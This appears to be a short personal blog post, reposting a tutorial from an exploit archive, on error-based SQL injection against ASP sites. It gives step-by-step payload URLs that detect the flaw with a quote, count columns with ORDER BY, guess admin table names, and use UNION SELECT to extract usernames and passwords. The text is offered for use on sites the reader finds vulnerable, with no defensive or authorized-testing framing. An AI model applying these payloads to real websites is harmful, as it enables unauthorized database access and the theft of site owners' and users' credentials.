I am Aaditya Purani, and here is my first blog post. I want to share my paper today.
This is my paper about Basic error based MSSQL Injection. You can find it on Milw00rm too
So first of all we will find some site that is Vulnerable and is on .asp
So assume that u got a site with the name of
now find page where the site is vul to sql injection…
You can check the Vulnerability by adding single quotation ‘
at the end of URL like
If u get this error…
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ‘department_id=1024”.
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
/deptdet.asp, line 122
Then this means the site is vuln to sql injections…
Now we are going to find the columns in it…
Normally we use — at the end of string but in this case we will be using #
http://www.target.com/product.asp?id=13 order by 1#
Suppose that the site has 10 columns…when you will use the query “order by 1#” (without double quotations)
You will not get any error…the page will load normally…but when you will use the query “order by 11#” (without double quotations) you will get an error this means that the site has 10 columns…
So we will have an error on this query
http://www.target.com/product.asp?id=13 order by 11#
But when we will use this query, we will not get any error.
http://www.target.com/product.asp?id=13 order by 10#
This tells us that the table has 10 columns.
If this is not working use string:
This should work 🙂,
Now we will write the query as…
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#
So now in next step we need name of a table to get number of targets visible column from all ..
let me explain bit , like in simple sql injection we use
union select 1,2,3,4,5,6 --
and we get a number to get information from site , in this we need a table name to get that number of visible column ,
so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7, ..,10
in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are ” admin,tbladmin,tbl_admin,user,users,login,info,email” etc . Suppose in the site we got admin table that is visible. Now our url will look like
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#
After this we will get number of largest visible column which we can use to get data from site. Suppose we got 3,7and 6 columns that are visible…
So now we are going to use 3 to get information now all we have to do is just put the name of column instead of 3 in string and we will get username and password ,
Now our URL will look like
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#
Suppose we got a username instead of the number 3.
and then change column name with passwords column name
you will get the password 😉
URL will be like
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#
Do manual SQLi and you will be the best